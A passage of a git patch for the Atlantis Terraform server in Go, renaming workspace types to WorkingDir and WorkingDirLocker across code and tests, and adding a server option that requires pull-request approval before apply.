 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *AtlantisWorkspaceLocker_Unlock_OngoingVerification) GetCapturedArguments() (string, string, int) {
+func (c *WorkingDirLocker_Unlock_OngoingVerification) GetCapturedArguments() (string, string, int) {
 	repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
 	return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
 }
 
-func (c *AtlantisWorkspaceLocker_Unlock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+func (c *WorkingDirLocker_Unlock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]string, len(params[0]))
diff --git a/server/events/models/models.go b/server/events/models/models.go
index a71251e7b0..cc50f1dd12 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -235,7 +235,8 @@ type ProjectCommandContext struct {
 
 	// CommentArgs are the extra arguments appended to comment,
 	// ex. atlantis plan -- -target=resource
-	CommentArgs []string
-	Workspace   string
-	ProjectName string
+	CommentArgs             []string
+	Workspace               string
+	ProjectName             string
+	RequireApprovalOverride bool
 }
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 6cfee21656..a850d17b7d 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -24,11 +24,12 @@ type ProjectCommandBuilder interface {
 }
 
 type DefaultProjectCommandBuilder struct {
-	ParserValidator         *yaml.ParserValidator
-	ProjectFinder           ProjectFinder
-	VCSClient               vcs.ClientProxy
-	Workspace               AtlantisWorkspace
-	AtlantisWorkspaceLocker AtlantisWorkspaceLocker
+	ParserValidator  *yaml.ParserValidator
+	ProjectFinder    ProjectFinder
+	VCSClient        vcs.ClientProxy
+	WorkingDir       WorkingDir
+	WorkingDirLocker WorkingDirLocker
+	RequireApproval  bool
 }
 
 type TerraformExec interface {
@@ -38,7 +39,7 @@ type TerraformExec interface {
 func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) {
 	// Need to lock the workspace we're about to clone to.
 	workspace := DefaultWorkspace
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
+	unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
 	if err != nil {
 		ctx.Log.Warn("workspace was locked")
 		return nil, err
@@ -46,7 +47,7 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 	ctx.Log.Debug("got workspace lock")
 	defer unlockFn()
 
-	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace)
+	repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace)
 	if err != nil {
 		return nil, err
 	}
@@ -132,13 +133,13 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
 	var projCtx models.ProjectCommandContext
 
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+	unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return projCtx, err
 	}
 	defer unlockFn()
 
-	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace)
+	repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace)
 	if err != nil {
 		return projCtx, err
 	}
@@ -189,7 +190,7 @@ func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd
 func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
 	var projCtx models.ProjectCommandContext
 
-	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
+	repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
 	if err != nil {
 		return projCtx, err
 	}
@@ -223,17 +224,18 @@ func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cm
 	}
 
 	projCtx = models.ProjectCommandContext{
-		BaseRepo:      ctx.BaseRepo,
-		HeadRepo:      ctx.HeadRepo,
-		Pull:          ctx.Pull,
-		User:          ctx.User,
-		Log:           ctx.Log,
-		CommentArgs:   cmd.Flags,
-		Workspace:     cmd.Workspace,
-		RepoRelPath:   cmd.Dir,
-		ProjectName:   cmd.ProjectName,
-		ProjectConfig: projCfg,
-		GlobalConfig:  globalCfg,
+		BaseRepo:                ctx.BaseRepo,
+		HeadRepo:                ctx.HeadRepo,
+		Pull:                    ctx.Pull,
+		User:                    ctx.User,
+		Log:                     ctx.Log,
+		CommentArgs:             cmd.Flags,
+		Workspace:               cmd.Workspace,
+		RepoRelPath:             cmd.Dir,
+		ProjectName:             cmd.ProjectName,
+		ProjectConfig:           projCfg,
+		GlobalConfig:            globalCfg,
+		RequireApprovalOverride: p.RequireApproval,
 	}
 	return projCtx, nil
 }
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
index b8fb20c1ca..41ace8e02f 100644
--- a/server/events/project_command_builder_test.go
+++ b/server/events/project_command_builder_test.go
@@ -6,11 +6,11 @@ package events_test
 //	tmpDir, cleanup := TempDir(t)
 //	defer cleanup()
 //
-//	workspace := mocks.NewMockAtlantisWorkspace()
+//	workspace := mocks.NewMockWorkingDir()
 //	vcsClient := vcsmocks.NewMockClientProxy()
 //
 //	builder := &events.DefaultProjectCommandBuilder{
-//		AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(),
+//		WorkingDirLocker: events.NewDefaultAtlantisWorkingDirLocker(),
 //		Workspace:               workspace,
 //		ParserValidator:         &yaml.ParserValidator{},
 //		VCSClient:               vcsClient,
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 8a4e1c4aa4..2b13f9facf 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -43,16 +43,16 @@ type PlanSuccess struct {
 }
 
 type ProjectCommandRunner struct {
-	Locker                  ProjectLocker
-	LockURLGenerator        LockURLGenerator
-	InitStepRunner          runtime.InitStepRunner
-	PlanStepRunner          runtime.PlanStepRunner
-	ApplyStepRunner         runtime.ApplyStepRunner
-	RunStepRunner           runtime.RunStepRunner
-	PullApprovedChecker     runtime.PullApprovedChecker
-	Workspace               AtlantisWorkspace
-	Webhooks                WebhooksSender
-	AtlantisWorkspaceLocker AtlantisWorkspaceLocker
+	Locker              ProjectLocker
+	LockURLGenerator    LockURLGenerator
+	InitStepRunner      runtime.InitStepRunner
+	PlanStepRunner      runtime.PlanStepRunner
+	ApplyStepRunner     runtime.ApplyStepRunner
+	RunStepRunner       runtime.RunStepRunner
+	PullApprovedChecker runtime.PullApprovedChecker
+	WorkingDir          WorkingDir
+	Webhooks            WebhooksSender
+	WorkingDirLocker    WorkingDirLocker
 }
 
 func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
@@ -69,14 +69,14 @@ func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCom
 	ctx.Log.Debug("acquired lock for project")
 
 	// Acquire internal lock for the directory we're going to operate in.
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+	unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return ProjectCommandResult{Error: err}
 	}
 	defer unlockFn()
 
 	// Clone is idempotent so okay to run even if the repo was already cloned.
-	repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
+	repoDir, cloneErr := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
 	if cloneErr != nil {
 		if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
 			ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
@@ -140,7 +140,7 @@ func (p *ProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCo
 }
 
 func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult {
-	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Workspace)
+	repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)
 	if err != nil {
 		if os.IsNotExist(err) {
 			return ProjectCommandResult{Error: errors.New("project has not been cloned–did you run plan?")}
@@ -149,22 +149,27 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 	}
 	absPath := filepath.Join(repoDir, ctx.RepoRelPath)
 
+	var applyRequirements []string
 	if ctx.ProjectConfig != nil {
-		for _, req := range ctx.ProjectConfig.ApplyRequirements {
-			switch req {
-			case "approved":
-				approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow
-				if err != nil {
-					return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
-				}
-				if !approved {
-					return ProjectCommandResult{Failure: "Pull request must be approved before running apply."}
-				}
+		applyRequirements = ctx.ProjectConfig.ApplyRequirements
+	}
+	if ctx.RequireApprovalOverride {
+		applyRequirements = []string{"approved"}
+	}
+	for _, req := range applyRequirements {
+		switch req {
+		case "approved":
+			approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow
+			if err != nil {
+				return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
+			}
+			if !approved {
+				return ProjectCommandResult{Failure: "Pull request must be approved before running apply."}
 			}
 		}
 	}
 	// Acquire internal lock for the directory we're going to operate in.
-	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+	unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return ProjectCommandResult{Error: err}
 	}
diff --git a/server/events/project_command_runner_test.go b/server/events/project_command_runner_test.go
index 2659c2d50c..530a067339 100644
--- a/server/events/project_command_runner_test.go
+++ b/server/events/project_command_runner_test.go
@@ -69,7 +69,7 @@ package events_test
 //}
 //
 //func TestExecute_CloneErr(t *testing.T) {
-//	t.Log("If AtlantisWorkspace.Clone returns an error we return an error")
+//	t.Log("If WorkingDir.Clone returns an error we return an error")
 //	p, _, _ := setupPlanExecutorTest(t)
 //	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
 //	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err"))
@@ -271,7 +271,7 @@ package events_test
 //func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) {
 //	RegisterMockTestingT(t)
 //	vcsProxy := vcsmocks.NewMockClientProxy()
-//	w := mocks.NewMockAtlantisWorkspace()
+//	w := mocks.NewMockWorkingDir()
 //	ppe := mocks.NewMockProjectPreExecutor()
 //	runner := tmocks.NewMockClient()
 //	locker := lmocks.NewMockLocker()
diff --git a/server/events/pull_closed_executor.go b/server/events/pull_closed_executor.go
index 79dadeff0f..c3dc472db2 100644
--- a/server/events/pull_closed_executor.go
+++ b/server/events/pull_closed_executor.go
@@ -38,9 +38,9 @@ type PullCleaner interface {
 // PullClosedExecutor executes the tasks required to clean up a closed pull
 // request.
 type PullClosedExecutor struct {
-	Locker    locking.Locker
-	VCSClient vcs.ClientProxy
-	Workspace AtlantisWorkspace
+	Locker     locking.Locker
+	VCSClient  vcs.ClientProxy
+	WorkingDir WorkingDir
 }
 
 type templatedProject struct {
@@ -55,7 +55,7 @@ var pullClosedTemplate = template.Must(template.New("").Parse(
 
 // CleanUpPull cleans up after a closed pull request.
 func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullRequest) error {
-	if err := p.Workspace.Delete(repo, pull); err != nil {
+	if err := p.WorkingDir.Delete(repo, pull); err != nil {
 		return errors.Wrap(err, "cleaning workspace")
 	}
 
diff --git a/server/events/pull_closed_executor_test.go b/server/events/pull_closed_executor_test.go
index e130a5304d..9a6af603ea 100644
--- a/server/events/pull_closed_executor_test.go
+++ b/server/events/pull_closed_executor_test.go
@@ -31,9 +31,9 @@ import (
 func TestCleanUpPullWorkspaceErr(t *testing.T) {
 	t.Log("when workspace.Delete returns an error, we return it")
 	RegisterMockTestingT(t)
-	w := mocks.NewMockAtlantisWorkspace()
+	w := mocks.NewMockWorkingDir()
 	pce := events.PullClosedExecutor{
-		Workspace: w,
+		WorkingDir: w,
 	}
 	err := errors.New("err")
 	When(w.Delete(fixtures.GithubRepo, fixtures.Pull)).ThenReturn(err)
@@ -44,11 +44,11 @@ func TestCleanUpPullWorkspaceErr(t *testing.T) {
 func TestCleanUpPullUnlockErr(t *testing.T) {
 	t.Log("when locker.UnlockByPull returns an error, we return it")
 	RegisterMockTestingT(t)
-	w := mocks.NewMockAtlantisWorkspace()
+	w := mocks.NewMockWorkingDir()
 	l := lockmocks.NewMockLocker()
 	pce := events.PullClosedExecutor{
-		Locker:    l,
-		Workspace: w,
+		Locker:     l,
+		WorkingDir: w,
 	}
 	err := errors.New("err")
 	When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, err)
@@ -59,13 +59,13 @@ func TestCleanUpPullUnlockErr(t *testing.T) {
 func TestCleanUpPullNoLocks(t *testing.T) {
 	t.Log("when there are no locks to clean up, we don't comment")
 	RegisterMockTestingT(t)
-	w := mocks.NewMockAtlantisWorkspace()
+	w := mocks.NewMockWorkingDir()
 	l := lockmocks.NewMockLocker()
 	cp := vcsmocks.NewMockClientProxy()
 	pce := events.PullClosedExecutor{
-		Locker:    l,
-		VCSClient: cp,
-		Workspace: w,
+		Locker:     l,
+		VCSClient:  cp,
+		WorkingDir: w,
 	}
 	When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, nil)
 	err := pce.CleanUpPull(fixtures.GithubRepo, fixtures.Pull)
@@ -139,13 +139,13 @@ func TestCleanUpPullComments(t *testing.T) {
 		},
 	}
 	for _, c := range cases {
-		w := mocks.NewMockAtlantisWorkspace()
+		w := mocks.NewMockWorkingDir()
 		cp := vcsmocks.NewMockClientProxy()
 		l := lockmocks.NewMockLocker()
 		pce := events.PullClosedExecutor{
-			Locker:    l,
-			VCSClient: cp,
-			Workspace: w,
+			Locker:     l,
+			VCSClient:  cp,
+			WorkingDir: w,
 		}
 		t.Log("testing: " + c.Description)
 		When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(c.Locks, nil)
diff --git a/server/events/atlantis_workspace.go b/server/events/working_dir.go
similarity index 89%
rename from server/events/atlantis_workspace.go
rename to server/events/working_dir.go
index 251adb7e34..77fcc56985 100644
--- a/server/events/atlantis_workspace.go
+++ b/server/events/working_dir.go
@@ -27,21 +27,21 @@ import (
 
 const workspacePrefix = "repos"
 
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_atlantis_workspace.go AtlantisWorkspace
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_working_dir.go WorkingDir
 
-// AtlantisWorkspace handles the workspace on disk for running commands.
-type AtlantisWorkspace interface {
+// WorkingDir handles the workspace on disk for running commands.
+type WorkingDir interface {
 	// Clone git clones headRepo, checks out the branch and then returns the
 	// absolute path to the root of the cloned repo.
 	Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error)
-	// GetWorkspace returns the path to the workspace for this repo and pull.
+	// GetWorkingDir returns the path to the workspace for this repo and pull.
 	// If workspace does not exist on disk, error will be of type os.IsNotExist.
-	GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error)
+	GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error)
 	// Delete deletes the workspace for this repo and pull.
 	Delete(r models.Repo, p models.PullRequest) error
 }
 
-// FileWorkspace implements AtlantisWorkspace with the file system.
+// FileWorkspace implements WorkingDir with the file system.
 type FileWorkspace struct {
 	DataDir string
 	// TestingOverrideCloneURL can be used during testing to override the URL
@@ -110,8 +110,8 @@ func (w *FileWorkspace) Clone(
 	return cloneDir, nil
 }
 
-// GetWorkspace returns the path to the workspace for this repo and pull.
-func (w *FileWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) {
+// GetWorkingDir returns the path to the workspace for this repo and pull.
+func (w *FileWorkspace) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error) {
 	repoDir := w.cloneDir(r, p, workspace)
 	if _, err := os.Stat(repoDir); err != nil {
 		return "", errors.Wrap(err, "checking if workspace exists")
diff --git a/server/events/atlantis_workspace_locker.go b/server/events/working_dir_locker.go
similarity index 70%
rename from server/events/atlantis_workspace_locker.go
rename to server/events/working_dir_locker.go
index c2c3e61800..8c45891c75 100644
--- a/server/events/atlantis_workspace_locker.go
+++ b/server/events/working_dir_locker.go
@@ -18,16 +18,14 @@ import (
 	"sync"
 )
 
-//go:generate pegomock generate --use-experimental-model-gen --package mocks -o mocks/mock_atlantis_workspace_locker.go AtlantisWorkspaceLocker
+//go:generate pegomock generate --use-experimental-model-gen --package mocks -o mocks/mock_working_dir_locker.go WorkingDirLocker
 
-// AtlantisWorkspaceLocker is used to prevent multiple commands from executing
+// WorkingDirLocker is used to prevent multiple commands from executing
 // at the same time for a single repo, pull, and workspace. We need to prevent
 // this from happening because a specific repo/pull/workspace has a single workspace
 // on disk and we haven't written Atlantis (yet) to handle concurrent execution
 // within this workspace.
-// This locker is called AtlantisWorkspaceLocker to differentiate it from the
-// Terraform concept of workspaces, not directories on disk managed by Atlantis.
-type AtlantisWorkspaceLocker interface {
+type WorkingDirLocker interface {
 	// TryLock tries to acquire a lock for this repo, workspace and pull.
 	// It returns a function that should be used to unlock the workspace and
 	// an error if the workspace is already locked. The error is expected to
@@ -38,20 +36,20 @@ type AtlantisWorkspaceLocker interface {
 	Unlock(repoFullName, workspace string, pullNum int)
 }
 
-// DefaultAtlantisWorkspaceLocker implements AtlantisWorkspaceLocker.
-type DefaultAtlantisWorkspaceLocker struct {
+// DefaultAtlantisWorkingDirLocker implements WorkingDirLocker.
+type DefaultAtlantisWorkingDirLocker struct {
 	mutex sync.Mutex
 	locks map[string]interface{}
 }
 
-// NewDefaultAtlantisWorkspaceLocker is a constructor.
-func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker {
-	return &DefaultAtlantisWorkspaceLocker{
+// NewDefaultAtlantisWorkingDirLocker is a constructor.
+func NewDefaultAtlantisWorkingDirLocker() *DefaultAtlantisWorkingDirLocker {
+	return &DefaultAtlantisWorkingDirLocker{
 		locks: make(map[string]interface{}),
 	}
 }
 
-func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+func (d *DefaultAtlantisWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
 	d.mutex.Lock()
 	defer d.mutex.Unlock()
 
@@ -69,12 +67,12 @@ func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace
 }
 
 // Unlock unlocks the repo, pull and workspace.
-func (d *DefaultAtlantisWorkspaceLocker) Unlock(repoFullName, workspace string, pullNum int) {
+func (d *DefaultAtlantisWorkingDirLocker) Unlock(repoFullName, workspace string, pullNum int) {
 	d.mutex.Lock()
 	defer d.mutex.Unlock()
 	delete(d.locks, d.key(repoFullName, workspace, pullNum))
 }
 
-func (d *DefaultAtlantisWorkspaceLocker) key(repo string, workspace string, pull int) string {
+func (d *DefaultAtlantisWorkingDirLocker) key(repo string, workspace string, pull int) string {
 	return fmt.Sprintf("%s/%s/%d", repo, workspace, pull)
 }
diff --git a/server/events/atlantis_workspace_locker_test.go b/server/events/working_dir_locker_test.go
similarity index 90%
rename from server/events/atlantis_workspace_locker_test.go
rename to server/events/working_dir_locker_test.go
index ae0e06a990..1083ba4221 100644
--- a/server/events/atlantis_workspace_locker_test.go
+++ b/server/events/working_dir_locker_test.go
@@ -24,7 +24,7 @@ var repo = "repo/owner"
 var workspace = "default"
 
 func TestTryLock(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 
 	// The first lock should succeed.
 	unlockFn, err := locker.TryLock(repo, workspace, 1)
@@ -43,7 +43,7 @@ func TestTryLock(t *testing.T) {
 }
 
 func TestTryLockDifferentWorkspaces(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 
 	t.Log("a lock for the same repo and pull but different workspace should succeed")
 	_, err := locker.TryLock(repo, workspace, 1)
@@ -59,7 +59,7 @@ func TestTryLockDifferentWorkspaces(t *testing.T) {
 }
 
 func TestTryLockDifferentRepo(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 
 	t.Log("a lock for a different repo but the same workspace and pull should succeed")
 	_, err := locker.TryLock(repo, workspace, 1)
@@ -76,7 +76,7 @@ func TestTryLockDifferentRepo(t *testing.T) {
 }
 
 func TestTryLockDifferentPulls(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 
 	t.Log("a lock for a different pull but the same repo and workspace should succeed")
 	_, err := locker.TryLock(repo, workspace, 1)
@@ -93,7 +93,7 @@ func TestTryLockDifferentPulls(t *testing.T) {
 }
 
 func TestUnlock(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 
 	t.Log("unlocking should work")
 	unlockFn, err := locker.TryLock(repo, workspace, 1)
@@ -104,7 +104,7 @@ func TestUnlock(t *testing.T) {
 }
 
 func TestUnlockDifferentWorkspaces(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 	t.Log("unlocking should work for different workspaces")
 	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
 	Ok(t, err1)
@@ -120,7 +120,7 @@ func TestUnlockDifferentWorkspaces(t *testing.T) {
 }
 
 func TestUnlockDifferentRepos(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 	t.Log("unlocking should work for different repos")
 	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
 	Ok(t, err1)
@@ -137,7 +137,7 @@ func TestUnlockDifferentRepos(t *testing.T) {
 }
 
 func TestUnlockDifferentPulls(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 	t.Log("unlocking should work for different pulls")
 	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
 	Ok(t, err1)
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 393c75fd8b..a87ab1bb9c 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -230,13 +230,13 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 	projectLocker := &events.DefaultProjectLocker{
 		Locker: lockingClient,
 	}
-	atlantisWorkspace := &events.FileWorkspace{
+	workingDir := &events.FileWorkspace{
 		DataDir:                 dataDir,
 		TestingOverrideCloneURL: "override-me",
 	}
 
 	defaultTFVersion := terraformClient.Version()
-	locker := events.NewDefaultAtlantisWorkspaceLocker()
+	locker := events.NewDefaultAtlantisWorkingDirLocker()
 	commandRunner := &events.DefaultCommandRunner{
 		ProjectCommandRunner: &events.ProjectCommandRunner{
 			Locker:           projectLocker,
@@ -252,11 +252,11 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 			ApplyStepRunner: runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner:           runtime.RunStepRunner{},
-			PullApprovedChecker:     e2eVCSClient,
-			Workspace:               atlantisWorkspace,
-			Webhooks:                &mockWebhookSender{},
-			AtlantisWorkspaceLocker: locker,
+			RunStepRunner:       runtime.RunStepRunner{},
+			PullApprovedChecker: e2eVCSClient,
+			WorkingDir:          workingDir,
+			Webhooks:            &mockWebhookSender{},
+			WorkingDirLocker:    locker,
 		},
 		EventParser:              eventParser,
 		VCSClient:                e2eVCSClient,
@@ -268,11 +268,11 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 		AllowForkPRs:             allowForkPRs,
 		AllowForkPRsFlag:         "allow-fork-prs",
 		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
-			ParserValidator:         &yaml.ParserValidator{},
-			ProjectFinder:           &events.DefaultProjectFinder{},
-			VCSClient:               e2eVCSClient,
-			Workspace:               atlantisWorkspace,
-			AtlantisWorkspaceLocker: locker,
+			ParserValidator:  &yaml.ParserValidator{},
+			ProjectFinder:    &events.DefaultProjectFinder{},
+			VCSClient:        e2eVCSClient,
+			WorkingDir:       workingDir,
+			WorkingDirLocker: locker,
 		},
 	}
 
@@ -280,9 +280,9 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 		TestingMode:   true,
 		CommandRunner: commandRunner,
 		PullCleaner: &events.PullClosedExecutor{
-			Locker:    lockingClient,
-			VCSClient: e2eVCSClient,
-			Workspace: atlantisWorkspace,
+			Locker:     lockingClient,
+			VCSClient:  e2eVCSClient,
+			WorkingDir: workingDir,
 		},
 		Logger:                       logger,
 		Parser:                       eventParser,
@@ -297,7 +297,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 		SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github},
 		VCSClient:         e2eVCSClient,
 	}
-	return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace
+	return ctrl, e2eVCSClient, e2eGithubGetter, workingDir
 }
 
 type mockLockURLGenerator struct{}
diff --git a/server/server.go b/server/server.go
index 45ad488912..f4db48d89f 100644
--- a/server/server.go
+++ b/server/server.go
@@ -188,8 +188,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		return nil, err
 	}
 	lockingClient := locking.NewClient(boltdb)
-	workspaceLocker := events.NewDefaultAtlantisWorkspaceLocker()
-	workspace := &events.FileWorkspace{
+	workingDirLocker := events.NewDefaultAtlantisWorkingDirLocker()
+	workingDir := &events.FileWorkspace{
 		DataDir: userConfig.DataDir,
 	}
 	projectLocker := &events.DefaultProjectLocker{
@@ -203,9 +203,9 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		Underlying:                underlyingRouter,
 	}
 	pullClosedExecutor := &events.PullClosedExecutor{
-		VCSClient: vcsClient,
-		Locker:    lockingClient,
-		Workspace: workspace,
+		VCSClient:  vcsClient,
+		Locker:     lockingClient,
+		WorkingDir: workingDir,
 	}
 	logger := logging.NewSimpleLogger("server", nil, false, logging.ToLogLevel(userConfig.LogLevel))
 	eventParser := &events.EventParser{
@@ -232,11 +232,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		AllowForkPRs:             userConfig.AllowForkPRs,
 		AllowForkPRsFlag:         config.AllowForkPRsFlag,
 		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
-			ParserValidator:         &yaml.ParserValidator{},
-			ProjectFinder:           &events.DefaultProjectFinder{},
-			VCSClient:               vcsClient,
-			Workspace:               workspace,
-			AtlantisWorkspaceLocker: workspaceLocker,
+			ParserValidator:  &yaml.ParserValidator{},
+			ProjectFinder:    &events.DefaultProjectFinder{},
+			VCSClient:        vcsClient,
+			WorkingDir:       workingDir,
+			WorkingDirLocker: workingDirLocker,
+			RequireApproval:  userConfig.RequireApproval,
 		},
 		ProjectCommandRunner: &events.ProjectCommandRunner{
 			Locker:           projectLocker,
@@ -252,11 +253,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 			ApplyStepRunner: runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner:           runtime.RunStepRunner{},
-			PullApprovedChecker:     vcsClient,
-			Workspace:               workspace,
-			Webhooks:                webhooksManager,
-			AtlantisWorkspaceLocker: workspaceLocker,
+			RunStepRunner:       runtime.RunStepRunner{},
+			PullApprovedChecker: vcsClient,
+			WorkingDir:          workingDir,
+			Webhooks:            webhooksManager,
+			WorkingDirLocker:    workingDirLocker,
 		},
 	}
 	repoWhitelist := &events.RepoWhitelistChecker{

From 6f8401d57bdb6e1ce1bb48d6fb396ba31c35cb9b Mon Sep 17 00:00:00 2001
